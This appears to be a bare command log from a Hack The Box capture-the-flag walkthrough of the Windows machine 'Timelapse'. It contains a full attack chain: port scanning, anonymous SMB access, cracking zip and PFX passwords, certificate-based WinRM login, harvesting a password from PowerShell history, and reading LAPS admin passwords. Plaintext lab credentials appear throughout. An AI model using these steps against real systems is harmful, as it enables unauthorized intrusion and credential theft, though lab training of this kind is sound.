Timelapse
HTB Windows
nmap -A -p- -oA timelapse 10.10.11.152 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA timelapse 10.10.11.152
nmap -sU -O -p- -oA timelapse-udp 10.10.11.152
ping -c 1 10.10.11.152

nmap -p- --open -T5 -v -n 10.10.11.152
echo "10.10.11.152 timelapse.htb" | sudo tee -a /etc/hosts

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.152 -oG allPorts
extractPorts allPorts

nmap -sCV -p53,88,135,139,445,464,593,636,3268,3269,5986,9389,49667,49675,49676,49,697,53333 10.10.11.152 -oN targeted

bc targeted -l rb

crackmapexec smb 10.10.11.152 --shares
smbclient -L 10.10.11.152 -N

smbmap -H 10.10.11.152 -u 'null'

smbclient //10.10.11.152/Shares -N

cd Dev
get winrm_backup.zip
7z l winrm_backup.zip

fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt winrm_backup.zip

unzip winrm_backup.zip

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
pfx2john legacyy_dev_auth.pfx

credenciales -> thuglegacy
crackpkcs12 -d /usr/share/wordlists/rockyou.txt legacyy_dev_auth.pfx

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem

evil-winrm -i 10.10.11.152 -c certificate.pem -k priv-key.pem -S
type user.txt

net user
whoami /priv

net user svc_deploy

type AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

crackmapexec smb 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'

evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Get-ADComputer DC01 -property 'ms-mcs-admpwd'

evil-winrm -i 10.10.11.152 -u 'administrator' -p '@m0bq+10Y&8eW;!d5Xj#[+z9' -S

type root.txt
